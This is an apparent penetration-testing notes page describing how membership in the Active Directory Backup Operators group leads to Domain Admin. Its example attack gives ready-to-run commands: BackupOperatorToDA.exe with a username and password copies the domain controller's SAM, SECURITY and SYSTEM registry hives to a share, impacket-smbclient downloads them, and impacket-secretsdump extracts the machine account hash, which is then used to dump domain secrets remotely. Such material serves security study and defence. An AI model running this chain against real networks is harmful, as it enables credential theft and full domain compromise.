Backup Operators

If you compromise an account member of the group Backup Operators you can become the Domain Admin without RDP or WinRM on the Domain Controller.

Membership in the Backup Operators group provides access to the DC file system due to the SeBackup and SeRestore privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the FILE_FLAG_BACKUP_SEMANTICS flag.

In short, Backup Operators == Domain Admin

Example attack

In this example, user Melissa is in the BACKUP [email protected] group.

We will use BackupOperatorToDA.exe to copy the SAM, SECURITY and SYSTEM files to a share of our choosing. In this example we simply move them to the DC C$ disk.

.\BackupOperatorToDA.exe -t \\ZPH-SVRCDC01.internal.zsm.local -u melissa -p Password123! -d internal.zsm.local -o \\192.168.210.16\c$\

Now we simply download these files to Kali, remember that SeBackup and SeRestore privileges allow us to directly access the C$ disk on the DC.

impacket-smbclient melissa:[email protected]

# use c$
# get SAM
# get SECURITY
# get SYSTEM
# exit

Now we utilize impacket's secretsdump on our local files:

impacket-secretsdump LOCAL -system SYSTEM -security SECURITY -sam SAM

We got the DC's machine account NTLM hash, we can now remotely dump the DC's secrets -> Remote Cred Dumping

impacket-secretsdump internal.zsm.local/ZPH-SVRCDC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:d47a6dAAAAAAAAA7514e393948

aad3b435b51404eeaad3b435b51404ee == blank LM hash

Tooling

https://github.com/mpgn/BackupOperatorToDA

Last updated 1 year ago